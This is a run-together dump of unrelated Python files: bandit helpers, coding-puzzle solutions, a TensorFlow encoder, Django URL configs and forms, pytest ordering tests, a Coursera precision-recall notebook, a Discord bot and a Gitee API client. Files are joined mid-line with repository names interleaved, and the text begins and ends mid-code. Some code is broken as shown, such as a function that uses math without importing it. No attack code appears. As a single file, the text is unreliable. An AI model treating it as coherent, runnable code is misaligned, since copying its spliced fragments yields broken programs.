""" if Na[l_prev] < min(r, tau) / (2 * K): b_r = np.ones(K) else: b_r = winners * (Na >= min(r, tau) / K) b_r[l_prev] = 1 m = np.amax(b_r * Na) n_argmax = np.nonzero((Na * b_r) == m)[0] if n_argmax.shape[0] == 1: l = n_argmax[0] return l else: s_max = (Sa * b_r)[n_argmax].max() s_argmax = np.nonzero((Sa * b_r)[n_argmax] == s_max)[0] if np.nonzero(n_argmax[s_argmax] == l_prev)[0].shape[0] > 0: return l_prev return n_argmax[np.random.choice(s_argmax)] def get_SSMC_star_min(rewards_l, n_challenger, reshape_size): return (np.array(rewards_l)[:n_challenger * reshape_size].reshape( (reshape_size, n_challenger))).mean(axis=1).min() def convert_tg_mean(mu, scale, step=1e-7): X = np.arange(0, 1, step) return (X * sc.norm.pdf(X, loc=mu, scale=scale)).mean() + 1 - sc.norm.cdf(1, loc=mu, scale=scale) def traj_arms(param_start, chg_dist, T): nb_arms = len(param_start) l_index = list(chg_dist.keys()) mean_arms = [np.zeros(T) for i in range(nb_arms)] idx_index = 0 for t in range(T): for arm in range(nb_arms): if idx_index < len(l_index): if t >= int(l_index[idx_index]): idx_index += 1 if idx_index == 0: if type(param_start[arm]) == list: mean_arms[arm][t] = param_start[arm][0] else: mean_arms[arm][t] = param_start[arm] else: if type(chg_dist[l_index[idx_index - 1]][1][arm]) == list: mean_arms[arm][t] = chg_dist[l_index[idx_index - 1]][1][arm][0] else: mean_arms[arm][t] = chg_dist[l_index[idx_index - 1]][1][arm] return mean_arms def plot_mean_arms(mean_arms, color_list, marker_list): n = len(mean_arms) T = len(mean_arms[0]) for i in range(n): if i == 0: plt.plot(mean_arms[i], color=color_list[i], label='Arm ' + str(i + 1)) else: plt.plot(mean_arms[i], color=color_list[i], marker=marker_list[i-1], markersize=8, markevery=T//10, label='Arm ' + str(i + 1)) plt.legend() plt.show() return 0 # The isBadVersion API is already defined for you. 
# @param version, an integer # @return a bool # def isBadVersion(version): class Solution(object): def firstBadVersion(self, n, start=1, end=None): """ :type n: int :rtype: int """ # set end var if it's undefined if not end: end = n # base case: n is 1 if end == start: if isBadVersion(end): return end else: return end+1 # if only 2 versions if end-start == 1: if isBadVersion(start): return start else: return end next = (end+start)//2 # if mid is bad version, look ahead if isBadVersion(next): return self.firstBadVersion(n, start, next) # else look behind else: return self.firstBadVersion(n, next, end) import time def main(): results = [] with open('21-input.txt', 'r') as f: input = [i.strip() for i in f.read().splitlines()] # A list of all ingredients, duplicated as per input ingredient_list = [] # A map of all allergens to their possible ingredients all_allergens = {} # A set of known allergenic ingredients allergenic_ingredients = set() # A set of all ingredients all_ingredients = set() for i in input: parts = i.split(' (contains ') ingredients = set([ingredient for ingredient in parts[0].split(' ')]) ingredient_list.extend(ingredients) all_ingredients.update(ingredients) allergens = parts[1][:-1].split(', ') for allergen in allergens: if allergen in all_allergens: all_allergens[allergen] = all_allergens[allergen] & ingredients else: all_allergens[allergen] = ingredients solved = False while not solved: solved = True for _,(k,v) in enumerate(all_allergens.items()): if len(v) > 1: solved = False else: (single_ingredient,) = v allergenic_ingredients.add(single_ingredient) for k in all_allergens: if len(all_allergens[k]) > 1: all_allergens[k] = all_allergens[k] - allergenic_ingredients results.append(len([i for i in ingredient_list if i not in allergenic_ingredients])) print(all_allergens) ordered_ingredients = [] for _,(k,v) in enumerate(sorted(all_allergens.items())): (ingredient,) = v ordered_ingredients.append(ingredient) results.append(','.join(ordered_ingredients)) for i,s in enumerate(results): print(f'{i+1}: {s}') if __name__ == '__main__': start_time = time.time_ns() main() print("--- Executed in {0:.3f} seconds ---".format((time.time_ns() - start_time) / (10 ** 9)))import tensorflow as tf from tensorflow.contrib import slim as slim from avb.ops import * import math def encoder(x, config, is_training=True): df_dim = config['df_dim'] z_dim = config['z_dim'] # Center x at 0 x = 2*x - 1 net = flatten_spatial(x) net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus, scope="fc_0") net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus, scope="fc_1") zmean = slim.fully_connected(net, z_dim, activation_fn=None) log_zstd = slim.fully_connected(net, z_dim, activation_fn=None) return zmean, log_zstd M0r13n/pricepicker-v21-10 import random import string from sqlalchemy import asc from project.server.models import Device, Repair class TestDevice: def test_order(self, sample_series, sample_color): letters = string.ascii_lowercase devices = [ Device.create(name=''.join(random.choice(letters) for x in range(10)), colors=[sample_color], series=sample_series) for i in range(10) ] assert len(devices) == 10 for i, device in enumerate(devices): assert device.order_index == i def test_normalize(self, sample_series, sample_color): letters = string.ascii_lowercase devices = [ Device.create(name=''.join(random.choice(letters) for x in range(10)), colors=[sample_color], series=sample_series) for i in range(10) ] for d in devices: d.order_index = 0 d.save() Device.normalize() for i, 
device in enumerate(devices): assert device.order_index == i def test_move_up(self, sample_series, sample_color): letters = string.ascii_lowercase devices = [ Device.create(name=''.join(random.choice(letters) for x in range(10)), colors=[sample_color], series=sample_series) for i in range(10) ] last = devices[-1] last_1 = devices[-2] assert last.order_index > last_1.order_index last.move_up() assert last.order_index < last_1.order_index for i in range(100): last.move_up() assert last.order_index == 0 def test_move_down(self, sample_series, sample_color): letters = string.ascii_lowercase devices = [ Device.create(name=''.join(random.choice(letters) for x in range(10)), colors=[sample_color], series=sample_series) for i in range(10) ] first = devices[0] first_1 = devices[1] assert first.order_index < first_1.order_index first.move_down() assert first.order_index > first_1.order_index for i in range(100): first.move_down() assert first.order_index == 9 class TestRepairSorting: def test_normalize(self, some_devices): for device in some_devices: # Create a display repair, a back-cover and a battery change Repair.create(device=device, name="Display") Repair.create(device=device, name="Back-cover") Repair.create(device=device, name="Battery") # Make sure all repairs were actually created assert Repair.query.count() == len(some_devices) * 3 assert all([r.order_index == 0 for r in Repair.query.all()]) Repair.normalize() repairs = Repair.query.all() # Normalize repairs should sort the repairs for every device # There should only be order indices from 0 to 2 for rep in repairs: assert rep.order_index < 3 assert rep.order_index >= 0 # There should be an even amount of 0,1 and 2 occurrences = { 0: 0, 1: 0, 2: 0 } for rep in repairs: occurrences[rep.order_index] += 1 assert occurrences[0] == len(some_devices) assert occurrences[1] == len(some_devices) assert occurrences[2] == len(some_devices) # For every device there should be a repair with the idx of 0 and 1 and 2 for dev in some_devices: reps = Repair.query.filter(Repair.device_id == dev.id).order_by(asc(Repair.order_index)) assert reps[0].order_index == 0 assert reps[1].order_index == 1 assert reps[2].order_index == 2 def test_query_order_by(self, sample_device): # Create a display repair, a back-cover and a battery change Repair.create(device=sample_device, name="Display") Repair.create(device=sample_device, name="Back-cover") Repair.create(device=sample_device, name="Battery") Repair.normalize() reps = sample_device.repairs assert reps[0].order_index == 0 assert reps[1].order_index == 1 assert reps[2].order_index == 2 def test_move_up(self, some_devices): for device in some_devices: # Create a display repair, a back-cover and a battery change Repair.create(device=device, name="Display") Repair.create(device=device, name="Back-cover") Repair.create(device=device, name="Battery") for i, rep in enumerate(some_devices[0].repairs): rep.order_index = i rep.save() # If I move the last repair one up, it should be swapped with the above original = some_devices[0].repairs some_devices[0].repairs[-1].move_up() now = some_devices[0].repairs assert original[0] == now[0] assert original[1] == now[2] assert original[2] == now[1] # If I move it one more up, it should be swapped with the elem above some_devices[0].repairs[1].move_up() now = some_devices[0].repairs assert original[0] == now[1] assert original[1] == now[2] assert original[2] == now[0] # But if I move it up again nothing should happen some_devices[0].repairs[0].move_up() 
some_devices[0].repairs[0].move_up() some_devices[0].repairs[0].move_up() some_devices[0].repairs[0].move_up() assert some_devices[0].repairs[0].order_index == 0 # All other repairs should remain unchanged assert all(rep.order_index == 0 for rep in Repair.query.all() if rep.device != some_devices[0]) def test_move_down(self, some_devices): for device in some_devices: # Create a display repair, a back-cover and a battery change Repair.create(device=device, name="Display") Repair.create(device=device, name="Back-cover") Repair.create(device=device, name="Battery") for i, rep in enumerate(some_devices[0].repairs): rep.order_index = i rep.save() device = some_devices[0] # If I move the last repair one down, it should be swapped with the below original = device.repairs device.repairs[0].move_down() now = device.repairs assert original[0] == now[1] assert original[1] == now[0] assert original[2] == now[2] # If I move it one more down, it should be swapped with the elem below device.repairs[1].move_down() now = device.repairs assert original[0] == now[2] assert original[1] == now[0] assert original[2] == now[1] # But if I move it up again nothing should happen device.repairs[-1].move_down() device.repairs[-1].move_down() device.repairs[-1].move_down() device.repairs[-1].move_down() assert device.repairs[-1].order_index == 2 # All other repairs should remain unchanged assert all(rep.order_index == 0 for rep in Repair.query.all() if rep.device != device) modelbrouwers/modelbrouwers1-10 from django.apps import AppConfig from django.utils.translation import ugettext_lazy as _ class MigrationConfig(AppConfig): name = 'brouwers.migration' verbose_name = _('Migrations') 1-10 class Solution: def countPrimeSetBits(self, L, R): """ :type L: int :type R: int :rtype: int """ r = int(math.log2(R)) def is_prime(num): return all(num % factor != 0 for factor in range(2, int(math.sqrt(num)) + 1)) primes = list(map(is_prime, range(r + 1))) primes[:2] = [False] * 2 return sum(primes[bin(num).count('1')] for num in range(L, R + 1)) 1-10 """dashboard URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.9/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Add an import: from blog import urls as blog_urls 2. Import the include() function: from django.conf.urls import url, include 3. 
Add a URL to urlpatterns: url(r'^blog/', include(blog_urls)) """ from django.conf.urls import url, include, patterns from django.contrib import admin from django.conf import settings from django.conf.urls.static import static from django.conf.urls.i18n import i18n_patterns from django.views.i18n import javascript_catalog from .views import ( Index, About, JarvisMenu, ChartTabs, ChartContents, IntegrationTable, BrowserNotSupport, ) urlpatterns = [ # local apps url(r'^accounts/', include('apps.accounts.urls', namespace='accounts')), url(r'^posts/', include('apps.posts.urls', namespace='posts')), url(r'^comments/', include('apps.comments.urls', namespace='comments')), url(r'^events/', include('apps.events.urls', namespace='events')), # i18n url(r'^jsi18n/$', javascript_catalog, name='parse_javascript'), url(r'^set-user-language/(?P[-\w]+)/$', Index.as_view(), name='set_user_language'), # third part url(r'^tracking/', include('tracking.urls')), # watchlist url(r'^set-user-watchlist/(?P\d+)/$', Index.as_view(), name='set_user_watchlist'), ] urlpatterns += i18n_patterns( # admin url(r'^{}/'.format(settings.ADMIN_HIDE_LOGIN), admin.site.urls), # pages url(r'^$', Index.as_view(), name='index'), url(r'^about/', About.as_view(), name='about'), url(r'^browser-not-support/', BrowserNotSupport.as_view(), name='browser_not_support'), # jarvis menu ajax url(r'^jarvismenu/(?P\d+)/(?P\w+)/(?P\d+)/$', JarvisMenu.as_view(), name='jarvismenu'), url(r'^jarvismenu/(?P\d+)/(?P\w+)/(?P\d+)/(?P\w+)/(?P\d+)/$', JarvisMenu.as_view(), name='jarvismenu'), # chart tab ajax url(r'^chart-tab/(?P\d+)/(?P\w+)/(?P\d+)/$', ChartTabs.as_view(), name='chart_tab'), url(r'^chart-tab/(?P\d+)/(?P\w+)/(?P\d+)/(?P\w+)/(?P\d+)/$', ChartTabs.as_view(), name='chart_tab'), # chart content ajax url(r'^chart-content/(?P\d+)/(?P\d+)/(?P\w+)/(?P\d+)/$', ChartContents.as_view(), name='chart_content'), url(r'^chart-content/(?P\d+)/(?P\d+)/(?P\w+)/(?P\d+)/(?P\w+)/(?P\d+)/$', ChartContents.as_view(), name='chart_content'), # chart content ajax url(r'^integration-table/(?P\d+)/(?P\d+)/(?P\w+)/(?P\d+)/$', IntegrationTable.as_view(), name='integration_table'), url(r'^integration-table/(?P\d+)/(?P\d+)/(?P\w+)/(?P\d+)/(?P\w+)/(?P\d+)/$', IntegrationTable.as_view(), name='integration_table'), ) if settings.DEBUG: urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) if settings.SERVE_MEDIA_FILES: urlpatterns += patterns( '', url(r'^%s(?P.*)$' % settings.MEDIA_URL.lstrip('/'), 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}), ) 10-100 # coding: utf-8 # # Exploring precision and recall # # The goal of this second notebook is to understand precision-recall in the context of classifiers. # # * Use Amazon review data in its entirety. # * Train a logistic regression model. # * Explore various evaluation metrics: accuracy, confusion matrix, precision, recall. # * Explore how various metrics can be combined to produce a cost of making an error. # * Explore precision and recall curves. # # Because we are using the full Amazon review dataset (not a subset of words or reviews), in this assignment we return to using GraphLab Create for its efficiency. As usual, let's start by **firing up GraphLab Create**. # # Make sure you have the latest version of GraphLab Create (1.8.3 or later). 
If you don't find the decision tree module, then you would need to upgrade graphlab-create using # # ``` # pip install graphlab-create --upgrade # ``` # See [this page](https://dato.com/download/) for detailed instructions on upgrading. # In[1]: import graphlab from __future__ import division import numpy as np graphlab.canvas.set_target('ipynb') # # Load amazon review dataset # In[2]: products = graphlab.SFrame('amazon_baby.gl/') # # Extract word counts and sentiments # As in the first assignment of this course, we compute the word counts for individual words and extract positive and negative sentiments from ratings. To summarize, we perform the following: # # 1. Remove punctuation. # 2. Remove reviews with "neutral" sentiment (rating 3). # 3. Set reviews with rating 4 or more to be positive and those with 2 or less to be negative. # In[3]: def remove_punctuation(text): import string return text.translate(None, string.punctuation) # Remove punctuation. review_clean = products['review'].apply(remove_punctuation) # Count words products['word_count'] = graphlab.text_analytics.count_words(review_clean) # Drop neutral sentiment reviews. products = products[products['rating'] != 3] # Positive sentiment to +1 and negative sentiment to -1 products['sentiment'] = products['rating'].apply(lambda rating : +1 if rating > 3 else -1) # Now, let's remember what the dataset looks like by taking a quick peek: # In[4]: products # ## Split data into training and test sets # # We split the data into a 80-20 split where 80% is in the training set and 20% is in the test set. # In[5]: train_data, test_data = products.random_split(.8, seed=1) # ## Train a logistic regression classifier # # We will now train a logistic regression classifier with **sentiment** as the target and **word_count** as the features. We will set `validation_set=None` to make sure everyone gets exactly the same results. # # Remember, even though we now know how to implement logistic regression, we will use GraphLab Create for its efficiency at processing this Amazon dataset in its entirety. The focus of this assignment is instead on the topic of precision and recall. # In[6]: model = graphlab.logistic_classifier.create(train_data, target='sentiment', features=['word_count'], validation_set=None) # # Model Evaluation # We will explore the advanced model evaluation concepts that were discussed in the lectures. # # ## Accuracy # # One performance metric we will use for our more advanced exploration is accuracy, which we have seen many times in past assignments. Recall that the accuracy is given by # # $$ # \mbox{accuracy} = \frac{\mbox{# correctly classified data points}}{\mbox{# total data points}} # $$ # # To obtain the accuracy of our trained models using GraphLab Create, simply pass the option `metric='accuracy'` to the `evaluate` function. We compute the **accuracy** of our logistic regression model on the **test_data** as follows: # In[7]: accuracy= model.evaluate(test_data, metric='accuracy')['accuracy'] print "Test Accuracy: %s" % accuracy # ## Baseline: Majority class prediction # # Recall from an earlier assignment that we used the **majority class classifier** as a baseline (i.e reference) model for a point of comparison with a more sophisticated classifier. The majority classifier model predicts the majority class for all data points. # # Typically, a good model should beat the majority class classifier. 
Since the majority class in this dataset is the positive class (i.e., there are more positive than negative reviews), the accuracy of the majority class classifier can be computed as follows: # In[8]: baseline = len(test_data[test_data['sentiment'] == 1])/len(test_data) print "Baseline accuracy (majority class classifier): %s" % baseline # ** Quiz Question:** Using accuracy as the evaluation metric, was our **logistic regression model** better than the baseline (majority class classifier)? # ## Confusion Matrix # # The accuracy, while convenient, does not tell the whole story. For a fuller picture, we turn to the **confusion matrix**. In the case of binary classification, the confusion matrix is a 2-by-2 matrix laying out correct and incorrect predictions made in each label as follows: # ``` # +---------------------------------------------+ # | Predicted label | # +----------------------+----------------------+ # | (+1) | (-1) | # +-------+-----+----------------------+----------------------+ # | True |(+1) | # of true positives | # of false negatives | # | label +-----+----------------------+----------------------+ # | |(-1) | # of false positives | # of true negatives | # +-------+-----+----------------------+----------------------+ # ``` # To print out the confusion matrix for a classifier, use `metric='confusion_matrix'`: # In[10]: confusion_matrix = model.evaluate(test_data, metric='confusion_matrix')['confusion_matrix'] confusion_matrix # **Quiz Question**: How many predicted values in the **test set** are **false positives**? # In[ ]: # ## Computing the cost of mistakes # # # Put yourself in the shoes of a manufacturer that sells a baby product on Amazon.com and you want to monitor your product's reviews in order to respond to complaints. Even a few negative reviews may generate a lot of bad publicity about the product. So you don't want to miss any reviews with negative sentiments --- you'd rather put up with false alarms about potentially negative reviews instead of missing negative reviews entirely. In other words, **false positives cost more than false negatives**. (It may be the other way around for other scenarios, but let's stick with the manufacturer's scenario for now.) # # Suppose you know the costs involved in each kind of mistake: # 1. \$100 for each false positive. # 2. \$1 for each false negative. # 3. Correctly classified reviews incur no cost. # # **Quiz Question**: Given the stipulation, what is the cost associated with the logistic regression classifier's performance on the **test set**? # In[11]: (1433 * 100) + (1406) # ## Precision and Recall # You may not have exact dollar amounts for each kind of mistake. Instead, you may simply prefer to reduce the percentage of false positives to be less than, say, 3.5% of all positive predictions. This is where **precision** comes in: # # $$ # [\text{precision}] = \frac{[\text{# positive data points with positive predicitions}]}{\text{[# all data points with positive predictions]}} = \frac{[\text{# true positives}]}{[\text{# true positives}] + [\text{# false positives}]} # $$ # So to keep the percentage of false positives below 3.5% of positive predictions, we must raise the precision to 96.5% or higher. # # **First**, let us compute the precision of the logistic regression classifier on the **test_data**. 
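# (A quick aside before using the built-in metric: the precision formula above can also be
# computed directly from confusion-matrix counts. The counts below are placeholders, not
# numbers from this dataset; this cell is only a sketch of the arithmetic.)

# In[ ]:

tp, fp = 900, 35  # hypothetical counts of true positives and false positives
precision_from_counts = tp / float(tp + fp)  # [# true positives] / ([# true positives] + [# false positives])
print "Precision (from counts): %s" % precision_from_counts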
# In[12]: precision = model.evaluate(test_data, metric='precision')['precision'] print "Precision on test data: %s" % precision # **Quiz Question**: Out of all reviews in the **test set** that are predicted to be positive, what fraction of them are **false positives**? (Round to the second decimal place e.g. 0.25) # In[15]: 1443 / float(1406 + 3798 + 1443 + 26689) # **Quiz Question:** Based on what we learned in lecture, if we wanted to reduce this fraction of false positives to be below 3.5%, we would: (see the quiz) # A complementary metric is **recall**, which measures the ratio between the number of true positives and that of (ground-truth) positive reviews: # # $$ # [\text{recall}] = \frac{[\text{# positive data points with positive predicitions}]}{\text{[# all positive data points]}} = \frac{[\text{# true positives}]}{[\text{# true positives}] + [\text{# false negatives}]} # $$ # # Let us compute the recall on the **test_data**. # In[16]: recall = model.evaluate(test_data, metric='recall')['recall'] print "Recall on test data: %s" % recall # **Quiz Question**: What fraction of the positive reviews in the **test_set** were correctly predicted as positive by the classifier? # # **Quiz Question**: What is the recall value for a classifier that predicts **+1** for all data points in the **test_data**? # In[17]: (26689 + 1406) / float(1406 + 26689) # # Precision-recall tradeoff # # In this part, we will explore the trade-off between precision and recall discussed in the lecture. We first examine what happens when we use a different threshold value for making class predictions. We then explore a range of threshold values and plot the associated precision-recall curve. # # ## Varying the threshold # # False positives are costly in our example, so we may want to be more conservative about making positive predictions. To achieve this, instead of thresholding class probabilities at 0.5, we can choose a higher threshold. # # Write a function called `apply_threshold` that accepts two things # * `probabilities` (an SArray of probability values) # * `threshold` (a float between 0 and 1). # # The function should return an array, where each element is set to +1 or -1 depending whether the corresponding probability exceeds `threshold`. # In[18]: def apply_threshold(probabilities, threshold): ### YOUR CODE GOES HERE # +1 if >= threshold and -1 otherwise. return probabilities.apply(lambda x: -1 if x < threshold else +1) # Run prediction with `output_type='probability'` to get the list of probability values. Then use thresholds set at 0.5 (default) and 0.9 to make predictions from these probability values. # In[19]: probabilities = model.predict(test_data, output_type='probability') predictions_with_default_threshold = apply_threshold(probabilities, 0.5) predictions_with_high_threshold = apply_threshold(probabilities, 0.9) # In[20]: print "Number of positive predicted reviews (threshold = 0.5): %s" % (predictions_with_default_threshold == 1).sum() # In[21]: print "Number of positive predicted reviews (threshold = 0.9): %s" % (predictions_with_high_threshold == 1).sum() # **Quiz Question**: What happens to the number of positive predicted reviews as the threshold increased from 0.5 to 0.9? # ## Exploring the associated precision and recall as the threshold varies # By changing the probability threshold, it is possible to influence precision and recall. 
We can explore this as follows: # In[22]: # Threshold = 0.5 precision_with_default_threshold = graphlab.evaluation.precision(test_data['sentiment'], predictions_with_default_threshold) recall_with_default_threshold = graphlab.evaluation.recall(test_data['sentiment'], predictions_with_default_threshold) # Threshold = 0.9 precision_with_high_threshold = graphlab.evaluation.precision(test_data['sentiment'], predictions_with_high_threshold) recall_with_high_threshold = graphlab.evaluation.recall(test_data['sentiment'], predictions_with_high_threshold) # In[23]: print "Precision (threshold = 0.5): %s" % precision_with_default_threshold print "Recall (threshold = 0.5) : %s" % recall_with_default_threshold # In[24]: print "Precision (threshold = 0.9): %s" % precision_with_high_threshold print "Recall (threshold = 0.9) : %s" % recall_with_high_threshold # **Quiz Question (variant 1)**: Does the **precision** increase with a higher threshold? # # **Quiz Question (variant 2)**: Does the **recall** increase with a higher threshold? # ## Precision-recall curve # # Now, we will explore various different values of tresholds, compute the precision and recall scores, and then plot the precision-recall curve. # In[25]: threshold_values = np.linspace(0.5, 1, num=100) print threshold_values # For each of the values of threshold, we compute the precision and recall scores. # In[29]: precision_all = [] recall_all = [] probabilities = model.predict(test_data, output_type='probability') for threshold in threshold_values: predictions = apply_threshold(probabilities, threshold) precision = graphlab.evaluation.precision(test_data['sentiment'], predictions) recall = graphlab.evaluation.recall(test_data['sentiment'], predictions) print "Precision (threshold = %s): %s" % (threshold, precision) print "Recall (threshold = %s) : %s" % (threshold, recall) precision_all.append(precision) recall_all.append(recall) # Now, let's plot the precision-recall curve to visualize the precision-recall tradeoff as we vary the threshold. # In[30]: import matplotlib.pyplot as plt get_ipython().magic(u'matplotlib inline') def plot_pr_curve(precision, recall, title): plt.rcParams['figure.figsize'] = 7, 5 plt.locator_params(axis = 'x', nbins = 5) plt.plot(precision, recall, 'b-', linewidth=4.0, color = '#B0017F') plt.title(title) plt.xlabel('Precision') plt.ylabel('Recall') plt.rcParams.update({'font.size': 16}) plot_pr_curve(precision_all, recall_all, 'Precision recall curve (all)') # **Quiz Question**: Among all the threshold values tried, what is the **smallest** threshold value that achieves a precision of 96.5% or better? Round your answer to 3 decimal places. # In[ ]: # **Quiz Question**: Using `threshold` = 0.98, how many **false negatives** do we get on the **test_data**? (**Hint**: You may use the `graphlab.evaluation.confusion_matrix` function implemented in GraphLab Create.) # In[31]: predictions_98threshold = apply_threshold(probabilities, 0.98) graphlab.evaluation.confusion_matrix(test_data['sentiment'], predictions_98threshold) # This is the number of false negatives (i.e the number of reviews to look at when not needed) that we have to deal with using this classifier. # # Evaluating specific search terms # So far, we looked at the number of false positives for the **entire test set**. In this section, let's select reviews using a specific search term and optimize the precision on these reviews only. 
After all, a manufacturer would be interested in tuning the false positive rate just for their products (the reviews they want to read) rather than that of the entire set of products on Amazon. # # ## Precision-Recall on all baby related items # # From the **test set**, select all the reviews for all products with the word 'baby' in them. # In[32]: baby_reviews = test_data[test_data['name'].apply(lambda x: 'baby' in x.lower())] # Now, let's predict the probability of classifying these reviews as positive: # In[33]: probabilities = model.predict(baby_reviews, output_type='probability') # Let's plot the precision-recall curve for the **baby_reviews** dataset. # # **First**, let's consider the following `threshold_values` ranging from 0.5 to 1: # In[34]: threshold_values = np.linspace(0.5, 1, num=100) # **Second**, as we did above, let's compute precision and recall for each value in `threshold_values` on the **baby_reviews** dataset. Complete the code block below. # In[35]: precision_all = [] recall_all = [] for threshold in threshold_values: # Make predictions. Use the `apply_threshold` function ## YOUR CODE HERE predictions = apply_threshold(probabilities, threshold) # Calculate the precision. # YOUR CODE HERE precision = graphlab.evaluation.precision(baby_reviews['sentiment'], predictions) # YOUR CODE HERE recall = graphlab.evaluation.recall(baby_reviews['sentiment'], predictions) print "Precision (threshold = %s): %s" % (threshold, precision) print "Recall (threshold = %s) : %s" % (threshold, recall) # Append the precision and recall scores. precision_all.append(precision) recall_all.append(recall) # **Quiz Question**: Among all the threshold values tried, what is the **smallest** threshold value that achieves a precision of 96.5% or better for the reviews of data in **baby_reviews**? Round your answer to 3 decimal places. # In[ ]: 0.863636363636 # **Quiz Question:** Is this threshold value smaller or larger than the threshold used for the entire dataset to achieve the same specified precision of 96.5%? # # **Finally**, let's plot the precision recall curve. 
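# (Before plotting, a sketch of one way to read off the smallest threshold that reaches the
# 96.5% precision target from the arrays computed above; it assumes `precision_all` is aligned
# index-for-index with `threshold_values`, as in the loop above.)

# In[ ]:

qualifying_thresholds = [t for t, p in zip(threshold_values, precision_all) if p >= 0.965]
if qualifying_thresholds:
    print "Smallest threshold with precision >= 0.965: %.3f" % min(qualifying_thresholds)
else:
    print "No threshold in this range reaches a precision of 0.965"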
# In[36]: plot_pr_curve(precision_all, recall_all, "Precision-Recall (Baby)") # In[ ]: aizakkusnail/test-dpy-ping-bot import discord, os from discord.ext import commands from discord.ext.commands import CommandNotFound client = commands.Bot( command_prefix=commands.when_mentioned_or("c."), intents=discord.Intents.default(), activity=discord.Game(name="c.chat with randos"), status=discord.Status.idle ) client.remove_command("help") @client.event async def on_ready(): print(f"{client.user.name}#{client.user.discriminator} is now up and running.") @client.event async def on_command_error(ctx, error): if isinstance(error, CommandNotFound): return if isinstance(error, commands.CommandOnCooldown): await ctx.send(f'Woops, you still got `{round(error.retry_after, 2)}` seconds before you can use the command again') return raise error @client.command() @commands.cooldown(1, 5, commands.BucketType.user) async def ping(ctx): await ctx.send(f"Pong ({round(client.latency * 1000)}ms)") client.run(TOKEN) 0 import pandas as pd import numpy as np def preprocess(df): df = df.sort_values(by=['date','time_i','sym_root']) N = df.shape[0] assert N%3 == 0 n = int(N/3) ary = np.zeros(shape=(n,3)) for i in range(0,n): row_AAPL = df.iloc[3*i] row_IBM = df.iloc[3*i+1] row_SPY = df.iloc[3*i+2] ary[i][0] = row_AAPL['price'] ary[i][1] = row_IBM['price'] ary[i][2] = row_SPY['price'] print('preprocess finished') return ary import requests import logging logging.basicConfig( level=logging.INFO, filename='./logs/pr.log', format='%(asctime)s - %(name)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) class GiteePROperation(): def __init__(self): self.prUrl = 'https://gitee.com/api/v5/repos/{owner}/{repo}/pulls' self.prMergeUrl = self.prUrl + '/{number}/merge' self.access_token = "xxxxx" def merge(self, owner, repo, number): prMergeUrl = self.prMergeUrl.format( owner=owner, repo=repo, number=number) payload = { "access_token": self.access_token, "merge_method": "squash", "prune_source_branch": "true" } r = requests.request( "PUT", prMergeUrl, params=payload, headers={'Content-Type': 'application/json'}) print(r.text) return r.status_code def getPRListWithOpenStatus(self, owner, repo): PRList = [] prUrl = self.prUrl.format(owner=owner, repo=repo) payload = { "access_token": self.access_token, "per_page": 100, "state": "open" } r = requests.request( "GET", prUrl, params=payload, headers={'Content-Type': 'application/json'}) for item in r.json(): PR = item['number'] PRList.append(PR) return PRList bpinsard/nipy # Init for benchmarks for algorithms linuxluigi/meetup-api class MeetupBaseException(Exception): """ All Meetup exceptions inherit from this exception. """ class ClientException(MeetupBaseException): """ Meetup Client Exception base class. """ class TokenError(ClientException): """ There is a problem with the client OAuth token. """ class ApiMethodError(ClientException): """ The called API method is not defined or does not exist. """ class ApiParameterError(ClientException): """ The called API method is missing a required parameter. """ class HttpMethodError(ClientException): """ The requested HTTP Method is not valid. """ class MeetupHttpBaseException(MeetupBaseException): """ All Meetup HTTP Exceptions inherit from this exception. """ class HttpClientError(MeetupHttpBaseException): """ Called when the server tells us there was a client error (4xx). 
""" class HttpUnauthorized(HttpClientError): """ Called when the server sends a 401 error (when you don't provide a valid OAuth token) """ class HttpNotFoundError(HttpClientError): """ Called when the server sends a 404 error. """ class HttpNotAccessibleError(HttpClientError): """ Called when the server sends a 410 error. """ class HttpTooManyRequests(HttpClientError): """ Called when the server sends a 429 error (when you've gone over your request rate limit) """ class HttpServerError(MeetupHttpBaseException): """ Called when the server tells us there was a server error (5xx). """ blueridger/HiFi-Registrationhifireg/registration/forms/registration.py1-10 from django.conf import settings from django import forms from django.core.exceptions import ValidationError from django.core.validators import MinValueValidator, MaxValueValidator from registration.models import CompCode, Order, Registration, Volunteer, CompCodeHelper YESNO = [(True, 'Yes'), (False, 'No')] class BetaPasswordForm(forms.Form): beta_password = forms.CharField(widget=forms.PasswordInput) def clean(self): cleaned_data = super().clean() password = cleaned_data.get('beta_password') if password != settings.BETA_PASSWORD: raise forms.ValidationError('Beta password is not correct') class RegisterPolicyForm(forms.ModelForm): class Meta: model = Registration fields = ['agrees_to_policy'] def clean_agrees_to_policy(self): agrees = self.cleaned_data.get('agrees_to_policy') if not agrees: raise forms.ValidationError('You must agree to the terms to proceed.') return agrees class RegVolunteerForm(forms.ModelForm): class Meta: model = Registration fields = ['wants_to_volunteer'] widgets = { 'wants_to_volunteer': forms.Select(choices=YESNO), } def __init__(self, *args, **kwargs): super(RegVolunteerForm, self).__init__(*args, **kwargs) self.fields['wants_to_volunteer'].required = True class RegVolunteerDetailsForm(forms.ModelForm): class Meta: model = Volunteer fields = [ 'cellphone_number', 'hours_max', 'image', 'skills', 'cantwont', ] widgets = { 'hours_max': forms.NumberInput(attrs={'min': 1, 'max': 8, 'value': 3}) } def __init__(self, *args, **kwargs): super(RegVolunteerDetailsForm, self).__init__(*args, **kwargs) self.fields['cellphone_number'].required = True self.fields['hours_max'].required = True self.fields['hours_max'].validators = [MinValueValidator(1), MaxValueValidator(8)] self.fields['image'].required = True class RegMiscForm(forms.ModelForm): class Meta: model = Registration fields = [ 'mailing_list', 'housing_transport_acknowledgement', 'accommodations', 'referral_code', 'registration_feedback', ] widgets = { 'mailing_list': forms.Select(choices=YESNO), 'housing_transport_acknowledgement': forms.Select(choices=YESNO), } def __init__(self, *args, **kwargs): super(RegMiscForm, self).__init__(*args, **kwargs) self.fields['mailing_list'].required = True self.fields['housing_transport_acknowledgement'].required = True def clean_housing_transport_acknowledgement(self): data 